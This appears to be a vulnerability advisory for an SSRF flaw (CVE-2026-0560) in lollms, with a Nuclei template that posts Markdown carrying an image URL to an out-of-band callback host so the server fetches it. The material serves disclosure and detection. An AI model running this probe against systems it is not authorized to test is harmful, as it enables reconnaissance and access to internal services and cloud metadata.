
LolLMS < 2.2.0 - Server-Side Request Forgery

CVE-2026-0560
Verified

Description

A Server-Side Request Forgery (SSRF) vulnerability exists in parisneo/lollms versions prior to 2.2.0. The /api/files/export-content endpoint processes Markdown image URLs by downloading them via _download_image_to_temp() in backend/routers/files.py without any validation, allowing an unauthenticated attacker to supply arbitrary URLs (e.g. cloud metadata endpoints or internal services) that the server will fetch, enabling internal network access, cloud metadata access, information disclosure, port scanning, and potentially remote code execution.

Severity

High

CVSS Score

7.5

Exploit Probability

2%

Affected Product

lollms

Published Date

April 21, 2026

Template Author

ritikchaddha

CVE-2026-0560.yaml
id: CVE-2026-0560

info:
  name: LolLMS < 2.2.0 - Server-Side Request Forgery
  author: ritikchaddha
  severity: high
  description: |
    A Server-Side Request Forgery (SSRF) vulnerability exists in parisneo/lollms versions prior to 2.2.0. The /api/files/export-content endpoint processes Markdown image URLs by downloading them via _download_image_to_temp() in backend/routers/files.py without any validation, allowing an unauthenticated attacker to supply arbitrary URLs (e.g. cloud metadata endpoints or internal services) that the server will fetch, enabling internal network access, cloud metadata access, information disclosure, port scanning, and potentially remote code execution.
  impact: |
    Attackers can access internal network services, cloud metadata, and potentially execute remote code.
  remediation: |
    Update to version 2.2.0 or later.
  reference:
    - https://huntr.com/bounties/65e43a5e-b902-4369-b738-1825285a3ea5
    - https://nvd.nist.gov/vuln/detail/CVE-2026-0560
    - https://github.com/parisneo/lollms/commit/76a54f0df2df8a5b254aa627d487b5dc939a0263
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2026-0560
    epss-score: 0.02051
    epss-percentile: 0.8399
    cwe-id: CWE-918
  metadata:
    verified: false
    max-request: 1
    vendor: parisneo
    product: lollms
    shodan-query: http.title:"lollms"
  tags: cve,cve2026,ssrf,lollms,oast

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: body
        words:
          - "LolLMS"
        internal: true
        case-insensitive: false

  - raw:
      - |
        POST /api/files/export-content HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"markdown_text":"# SSRF Test\n\n![ssrf](http://{{interactsh-url}}/ssrf-probe)\n","output_format":"docx"}

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"

      - type: status
        status:
          - 200
# digest: 4a0a004730450221009ebcc507c2422b8a7c67e7bfaee355207b02ced29abb5f7b7bc9ba047d543652022075af1a5e4adfa8c8d04f5cb5692dd3e243b933a9e3fa20d7d8faf9b56b872e9f:922c64590222798bb761d5b6d8e72950

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
CVE ID:
CVE-2026-0560
CWE ID:
CWE-918

References

https://huntr.com/bounties/65e43a5e-b902-4369-b738-1825285a3ea5
https://nvd.nist.gov/vuln/detail/CVE-2026-0560
https://github.com/parisneo/lollms/commit/76a54f0df2df8a5b254aa627d487b5dc939a0263

Remediation Steps

Update to version 2.2.0 or later.